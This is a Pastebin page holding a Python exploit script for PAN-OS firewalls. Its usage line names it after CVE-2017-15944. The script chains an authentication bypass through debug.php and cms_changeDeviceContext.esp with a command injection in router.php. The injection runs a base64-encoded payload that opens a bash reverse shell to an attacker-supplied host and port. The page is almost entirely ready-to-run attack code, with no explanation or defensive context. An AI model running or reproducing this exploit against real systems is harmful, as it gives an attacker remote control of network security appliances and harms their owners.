API tools faq
paste
Advertisement
Guest User

panos-poc-rce-v2.py

a guest
Mar 13th, 2018
1,084
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.27 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # encoding: utf-8
  3. import requests
  4. import sys
  5. import base64
  6.  
  7. requests.packages.urllib3.disable_warnings()
  8. session = requests.Session()
  9.  
  10. def step3_exp(lhost, lport):
  11.     command = base64.b64encode('''exec("import os; os.system('bash -i >& /dev/tcp/{}/{} 0>&1')")'''.format(lhost, lport))
  12.     exp_post = r'''{"action":"PanDirect","method":"execute","data":["07c5807d0d927dcd0980f86024e5208b","Administrator.get",{"changeMyPassword":true,"template":"asd","id":"admin']\" async-mode='yes' refresh='yes'  cookie='../../../../../../../../../tmp/* -print -exec python -c exec(\"'''+ command + r'''\".decode(\"base64\")) ;'/>\u0000"}],"type":"rpc","tid": 713}'''
  13.     return exp_post
  14.  
  15. def exploit(target, port):
  16.     step1_url = 'https://{}:{}/php/utils/debug.php'.format(target, port)
  17.     step2_url = 'https://{}:{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target, port)
  18.     step3_url = 'https://{}:{}/php/utils/router.php/Administrator.get'.format(target, port)
  19.  
  20.     try:
  21.         if session.get(step1_url, verify=False).status_code == 200:
  22.             if session.get(step2_url, verify=False).status_code == 200:
  23.                 r = session.get(step1_url, verify=False)
  24.         if 'Debug Console' in r.text:
  25.             print '[+] bypass success'
  26.             lhost = raw_input('[*] LHOST: ')
  27.             if lhost:
  28.                 print '[+] set LHOST = {}'.format(lhost)
  29.                 lport = raw_input('[*] LPORT: ')
  30.             else:
  31.                 exit('[!] LHOST invalid')
  32.             if lport:
  33.                 print '[+] set LPORT = {}'.format(lport)
  34.             else:
  35.                 exit('[!] LPORT invalid')
  36.             exp_post = step3_exp(lhost, lport)
  37.             rce = session.post(step3_url, data=exp_post).json()
  38.             if rce['result']['@status'] == 'success':
  39.                 print '[+] success, please wait ... '
  40.                 print '[+] jobID: {}'.format(rce['result']['result']['job'])
  41.             else:
  42.                 exit('[!] fail')
  43.         else:
  44.             exit('[!] bypass fail')
  45.     except Exception, err:
  46.         print err
  47.  
  48.  
  49. if __name__ == '__main__':
  50.     if len(sys.argv) <= 3:
  51.         exploit(sys.argv[1], sys.argv[2])
  52.     else:
  53.         exit('[+] usage: python CVE_2017_15944_EXP.py IP PORT')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!